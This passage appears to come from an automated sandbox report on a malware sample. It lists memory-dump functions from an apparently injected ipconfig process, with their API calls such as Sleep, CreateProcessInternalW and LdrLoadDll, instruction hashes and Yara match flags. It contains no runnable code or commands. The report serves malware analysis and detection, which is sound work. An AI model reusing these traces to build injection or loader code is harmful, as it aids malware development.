                                                                                                                                                      • Opcode ID: 77bf78547dbfcd29f3d6eb3bb6a4f898bbb4ff965209f3102069703ea76c90a1
                                                                                                                                                      • Instruction ID: 5b5e328358d460f9fb6875d86ea8911efdcf552c1e649ea171d435d81d0257f8
                                                                                                                                                      • Opcode Fuzzy Hash: 77bf78547dbfcd29f3d6eb3bb6a4f898bbb4ff965209f3102069703ea76c90a1
                                                                                                                                                      • Instruction Fuzzy Hash: 3090023120100C42D540A5584504B46000D8BE0345F51D41BA1114654DC729C8517532
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 03A52B90, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30165083413.00000000039E0000.00000040.00000001.sdmp, Offset: 039E0000, based on PE: true
                                                                                                                                                      • Associated: 0000000E.00000002.30166774620.0000000003B09000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000E.00000002.30166829665.0000000003B0D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_39e0000_ipconfig.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: e43d123142d4a35bee9ab92b72c6189c961266ee9f3eb777675664c2b32b02c2
                                                                                                                                                      • Instruction ID: cc0fcce29a7f59416d1db0d47cd7a0a5dd46a9623a14d2750c1c6e12c5307f3c
                                                                                                                                                      • Opcode Fuzzy Hash: e43d123142d4a35bee9ab92b72c6189c961266ee9f3eb777675664c2b32b02c2
                                                                                                                                                      • Instruction Fuzzy Hash: 9090023120108C02D550A558850474A000D8BD0345F55D816A5414658DC7A988917132
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 03A52BC0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30165083413.00000000039E0000.00000040.00000001.sdmp, Offset: 039E0000, based on PE: true
                                                                                                                                                      • Associated: 0000000E.00000002.30166774620.0000000003B09000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000E.00000002.30166829665.0000000003B0D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_39e0000_ipconfig.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 458464b2e2cc21b7c6b3ee444c507903c80adb022c83802ab49f9aab9d6806d4
                                                                                                                                                      • Instruction ID: 1ea71d4f4a40528ad529abe338416e53cd40417a70efa37a4fa920708607c780
                                                                                                                                                      • Opcode Fuzzy Hash: 458464b2e2cc21b7c6b3ee444c507903c80adb022c83802ab49f9aab9d6806d4
                                                                                                                                                      • Instruction Fuzzy Hash: 5890023120100802D540A9985508646000D8BE0345F51E416A6014555EC77988917132
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 03A52A80, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30165083413.00000000039E0000.00000040.00000001.sdmp, Offset: 039E0000, based on PE: true
                                                                                                                                                      • Associated: 0000000E.00000002.30166774620.0000000003B09000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000E.00000002.30166829665.0000000003B0D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_39e0000_ipconfig.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 1c1105cd5d2cfa6688a342ba509bc909d37f323daf9fd341edf0c93966ac39d6
                                                                                                                                                      • Instruction ID: dc155f518956082eab576fd0756a8dd2125c7636a13e1976c4ea78ec1cb4564f
                                                                                                                                                      • Opcode Fuzzy Hash: 1c1105cd5d2cfa6688a342ba509bc909d37f323daf9fd341edf0c93966ac39d6
                                                                                                                                                      • Instruction Fuzzy Hash: 21900261202004034545B5584514616400E8BE0245B51D426E2004590DC63988917136
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 03A529F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30165083413.00000000039E0000.00000040.00000001.sdmp, Offset: 039E0000, based on PE: true
                                                                                                                                                      • Associated: 0000000E.00000002.30166774620.0000000003B09000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000E.00000002.30166829665.0000000003B0D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_39e0000_ipconfig.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 0151a21d8b0addfb6da1cb8d82d304689df63d3458e680f350d979979c18356f
                                                                                                                                                      • Instruction ID: 25df0f501437a04eb5ce77a1f0b870ccea58818fa7a7d12467622b3fcdfac6c7
                                                                                                                                                      • Opcode Fuzzy Hash: 0151a21d8b0addfb6da1cb8d82d304689df63d3458e680f350d979979c18356f
                                                                                                                                                      • Instruction Fuzzy Hash: E2900225211004030545E9580704507004E8BD5395351D426F2005550CD73588616132
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 03A52FB0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30165083413.00000000039E0000.00000040.00000001.sdmp, Offset: 039E0000, based on PE: true
                                                                                                                                                      • Associated: 0000000E.00000002.30166774620.0000000003B09000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000E.00000002.30166829665.0000000003B0D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_39e0000_ipconfig.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: e63e043d16b3ac6a28b494b1d9858c9ff3da4d6d5f510db9b72dd2afcde229de
                                                                                                                                                      • Instruction ID: 7c41a74c0b4dacfc49000889452af3b8c067179b10d5345e8aae73f017d228ff
                                                                                                                                                      • Opcode Fuzzy Hash: e63e043d16b3ac6a28b494b1d9858c9ff3da4d6d5f510db9b72dd2afcde229de
                                                                                                                                                      • Instruction Fuzzy Hash: B690022124100C02D580B5588514707000ECBD0645F51D416A1014554DC72A896576B2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 03A52F00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30165083413.00000000039E0000.00000040.00000001.sdmp, Offset: 039E0000, based on PE: true
                                                                                                                                                      • Associated: 0000000E.00000002.30166774620.0000000003B09000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000E.00000002.30166829665.0000000003B0D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_39e0000_ipconfig.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: a1dd355edf6499667420269831f7efde18d2055086565c1fb54297abcb4c25ae
                                                                                                                                                      • Instruction ID: 89e1b3e4acd07f74e61a48ac3a22cfc2e9dffa9a7167e3f7459d0fe0aa1dce5a
                                                                                                                                                      • Opcode Fuzzy Hash: a1dd355edf6499667420269831f7efde18d2055086565c1fb54297abcb4c25ae
                                                                                                                                                      • Instruction Fuzzy Hash: 0F90022121180442D640A9684D14B07000D8BD0347F51D51AA1144554CCA2988616532
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 03A52E50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30165083413.00000000039E0000.00000040.00000001.sdmp, Offset: 039E0000, based on PE: true
                                                                                                                                                      • Associated: 0000000E.00000002.30166774620.0000000003B09000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000E.00000002.30166829665.0000000003B0D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_39e0000_ipconfig.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: bf5a7db688ce22def4fc60886b8dd72ae1fe677ce6998be112d45da91da7324c
                                                                                                                                                      • Instruction ID: 5689dba88c50d8b6b93cf97b3cd4965232c3f4941ae9bc31d7e419b384e16956
                                                                                                                                                      • Opcode Fuzzy Hash: bf5a7db688ce22def4fc60886b8dd72ae1fe677ce6998be112d45da91da7324c
                                                                                                                                                      • Instruction Fuzzy Hash: E890026134100842D540A5584514B06000DCBE1345F51D41AE2054554DC72DCC527137
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 03A52DC0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30165083413.00000000039E0000.00000040.00000001.sdmp, Offset: 039E0000, based on PE: true
                                                                                                                                                      • Associated: 0000000E.00000002.30166774620.0000000003B09000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000E.00000002.30166829665.0000000003B0D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_39e0000_ipconfig.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: db46e693b3de941001a55d256707ba38ce81fe0514285b394f97d1817091da76
                                                                                                                                                      • Instruction ID: 00ed05dc2f3b56c1b8928cb0b8120c901127b05bb37bc524ab467ab65245dcea
                                                                                                                                                      • Opcode Fuzzy Hash: db46e693b3de941001a55d256707ba38ce81fe0514285b394f97d1817091da76
                                                                                                                                                      • Instruction Fuzzy Hash: 5690027120100802D580B5584504746000D8BD0345F51D416A6054554EC76D8DD57676
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 03A52D10, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30165083413.00000000039E0000.00000040.00000001.sdmp, Offset: 039E0000, based on PE: true
                                                                                                                                                      • Associated: 0000000E.00000002.30166774620.0000000003B09000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000E.00000002.30166829665.0000000003B0D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_39e0000_ipconfig.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 98be169629c181a2a0bdc6aa98d2fd1bcb3fa63fd18bca1599ead4fb2173a4fe
                                                                                                                                                      • Instruction ID: 6ff097379290a93bcc7ffddfbe8c318dbce0017930b3ce15a85ded6d7ae6640c
                                                                                                                                                      • Opcode Fuzzy Hash: 98be169629c181a2a0bdc6aa98d2fd1bcb3fa63fd18bca1599ead4fb2173a4fe
                                                                                                                                                      • Instruction Fuzzy Hash: 6590023120100813D551A5584604707000D8BD0285F91D817A1414558DD76A8952B132
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 03A52CF0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30165083413.00000000039E0000.00000040.00000001.sdmp, Offset: 039E0000, based on PE: true
                                                                                                                                                      • Associated: 0000000E.00000002.30166774620.0000000003B09000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000E.00000002.30166829665.0000000003B0D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_39e0000_ipconfig.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 4a72d5730c0155778cc5b59c955f700885dbf9cd4e8d74ab50eaee059b440d39
                                                                                                                                                      • Instruction ID: 3caca300164b48a14819b3cb5751d2bd72e8c70437cc32522b8812f8f3abad9a
                                                                                                                                                      • Opcode Fuzzy Hash: 4a72d5730c0155778cc5b59c955f700885dbf9cd4e8d74ab50eaee059b440d39
                                                                                                                                                      • Instruction Fuzzy Hash: F8900221242045525985F5584504507400E9BE0285791D417A2404950CC63A9856E632
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 03A52C30, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30165083413.00000000039E0000.00000040.00000001.sdmp, Offset: 039E0000, based on PE: true
                                                                                                                                                      • Associated: 0000000E.00000002.30166774620.0000000003B09000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000E.00000002.30166829665.0000000003B0D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_39e0000_ipconfig.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 8617a4abde9c1c3ce5084a1f9ecae435920c1b344dc0ecd089c2db64bc6914f0
                                                                                                                                                      • Instruction ID: 5ffc03439920f4fc0cc46b44b850b4a5fc8e3f98dba9de3c20f8ac9c3d6233d3
                                                                                                                                                      • Opcode Fuzzy Hash: 8617a4abde9c1c3ce5084a1f9ecae435920c1b344dc0ecd089c2db64bc6914f0
                                                                                                                                                      • Instruction Fuzzy Hash: 4090022921300402D5C0B558550860A000D8BD1246F91E81AA1005558CCA2988696332
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 02F37300, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • Sleep.KERNELBASE(000007D0), ref: 02F373A8
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_2f20000_ipconfig.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Sleep
                                                                                                                                                      • String ID: net.dll$wininet.dll
                                                                                                                                                      • API String ID: 3472027048-1269752229
                                                                                                                                                      • Opcode ID: 6ece6e09f70b34fa414e06c8ea1764c9fb31213e635066fd50b1daabab7c254a
                                                                                                                                                      • Instruction ID: acaca474eb5b6cc81af1816453524cc95b78efbbb144a1ead8d8b75ae14fd267
                                                                                                                                                      • Opcode Fuzzy Hash: 6ece6e09f70b34fa414e06c8ea1764c9fb31213e635066fd50b1daabab7c254a
                                                                                                                                                      • Instruction Fuzzy Hash: D7318FB6A01604ABD716EF64CCA0FA7F7B9AF88740F00811DFA599B241D730B545CBA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 02F372FE, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 78sleepCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • Sleep.KERNELBASE(000007D0), ref: 02F373A8
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_2f20000_ipconfig.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Sleep
                                                                                                                                                      • String ID: net.dll$wininet.dll
                                                                                                                                                      • API String ID: 3472027048-1269752229
                                                                                                                                                      • Opcode ID: 52bc0b7f50d992d2e30635ffa7975fd8355d99cde913227442bca6d09a125716
                                                                                                                                                      • Instruction ID: 3221ad59a9944af5aa93e04b9898276741a03631fead39f09b12d4eec890e6f9
                                                                                                                                                      • Opcode Fuzzy Hash: 52bc0b7f50d992d2e30635ffa7975fd8355d99cde913227442bca6d09a125716
                                                                                                                                                      • Instruction Fuzzy Hash: FA21B4B2A41200ABC711EF64CCA1FABFBB4FF48740F00811DFA199B241D770A445CB91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 02F388E2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02F23B93), ref: 02F3891D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_2f20000_ipconfig.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FreeHeap
                                                                                                                                                      • String ID: .z`
                                                                                                                                                      • API String ID: 3298025750-1441809116
                                                                                                                                                      • Opcode ID: ac1790c454beff9ea0d608bf1134bd1a52768fcd95365797c4fcb64701a2fe7d
                                                                                                                                                      • Instruction ID: a478938703498a3cd8a00ff30d99fd7ddff5d4b28489afa4dc17d6d3efbfbf74
                                                                                                                                                      • Opcode Fuzzy Hash: ac1790c454beff9ea0d608bf1134bd1a52768fcd95365797c4fcb64701a2fe7d
                                                                                                                                                      • Instruction Fuzzy Hash: 36F065B1600214ABDB14DF68DC49ED737A9EF84790F114598FD4857241C671E914CFA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 02F388F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02F23B93), ref: 02F3891D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_2f20000_ipconfig.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FreeHeap
                                                                                                                                                      • String ID: .z`
                                                                                                                                                      • API String ID: 3298025750-1441809116
                                                                                                                                                      • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                      • Instruction ID: 0155dfec9c4afb2be9c8dc6f15a9123a9d14f055ac8d57ecefccff4ceee76ccc
                                                                                                                                                      • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                      • Instruction Fuzzy Hash: 95E046B1200208ABDB18EF99CC48EA777ADEF88790F018558FE086B341C670F910CAF0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 02F31760, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • CoInitialize.OLE32(00000000,00000000,02F23AC6,00000000), ref: 02F31777
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_2f20000_ipconfig.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Initialize
                                                                                                                                                      • String ID: @J7<
                                                                                                                                                      • API String ID: 2538663250-2016760708
                                                                                                                                                      • Opcode ID: 21b4cb6494d58fb2d9f89c17ae3ee88c2eb30e53bc4433914fff54258ca215c3
                                                                                                                                                      • Instruction ID: c761cb6f27221b4aba5447cab84acd20cb7bc24f0aaea8ce91e1f344a017ed50
                                                                                                                                                      • Opcode Fuzzy Hash: 21b4cb6494d58fb2d9f89c17ae3ee88c2eb30e53bc4433914fff54258ca215c3
                                                                                                                                                      • Instruction Fuzzy Hash: D13110B6A002099FDB01DFD8D880DEFB7B9BF88344B108559E619AB254D775AE05CBA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 02F3175E, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 100COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • CoInitialize.OLE32(00000000,00000000,02F23AC6,00000000), ref: 02F31777
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_2f20000_ipconfig.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Initialize
                                                                                                                                                      • String ID: @J7<
                                                                                                                                                      • API String ID: 2538663250-2016760708
                                                                                                                                                      • Opcode ID: b6a0e72435744ef3055ad4891f0d00ddc2d3dfed23193298c0d6e5199d10fa52
                                                                                                                                                      • Instruction ID: 28374ad5a56348f113bf7859a54872ae591d3d21a921e465b95d0b4803e8e7a9
                                                                                                                                                      • Opcode Fuzzy Hash: b6a0e72435744ef3055ad4891f0d00ddc2d3dfed23193298c0d6e5199d10fa52
                                                                                                                                                      • Instruction Fuzzy Hash: 58312376A002099FDB01DFD8D880DEFB7B9FF48344B148559E615E7214D775AE05CBA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 02F27280, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02F272DA
                                                                                                                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02F272FB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_2f20000_ipconfig.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessagePostThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1836367815-0
                                                                                                                                                      • Opcode ID: f3663199beabf3b2e139a43e338370e3a84a0ac6ed7f57403b6f9c19571d6667
                                                                                                                                                      • Instruction ID: b611444a17a8985a13ac757bbefde616d6c184ec54ace3ce45322fa86119ec37
                                                                                                                                                      • Opcode Fuzzy Hash: f3663199beabf3b2e139a43e338370e3a84a0ac6ed7f57403b6f9c19571d6667
                                                                                                                                                      • Instruction Fuzzy Hash: BE01DB31E8022977E721B6959C02FFE776C9B41F91F140114FF04BA1C0EAD469094BF6
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 02F389F5, Relevance: 1.6, APIs: 1, Instructions: 57processCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02F389B4
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_2f20000_ipconfig.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateInternalProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2186235152-0
                                                                                                                                                      • Opcode ID: 558c73087d880e6b38b06aeba6b12e23934193b87adee1dac964df1075fddadc
                                                                                                                                                      • Instruction ID: 585701c63179266f54cd3a165698d9022f5a59b4d3abc870806b940bd92ae5c9
                                                                                                                                                      • Opcode Fuzzy Hash: 558c73087d880e6b38b06aeba6b12e23934193b87adee1dac964df1075fddadc
                                                                                                                                                      • Instruction Fuzzy Hash: F011B3B6204208AFDB15DF89DC91EEB73ADEF8C754F118658FA4D97240C630E811CBA1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 02F29B40, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02F29BB2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_2f20000_ipconfig.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Load
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2234796835-0
                                                                                                                                                      • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                                                                                                                      • Instruction ID: 0a259dd23b60a00826ea502480d3b98c810a85356e6f901220b03df0327748fa
                                                                                                                                                      • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                                                                                                                      • Instruction Fuzzy Hash: A8011EB5D0020DBBDF10DAA5DC41F9DB379AF54348F1041A5EA0897285F671E718CB91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 02F38960, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02F389B4
                                                                                                                                                      Memory Dump Source
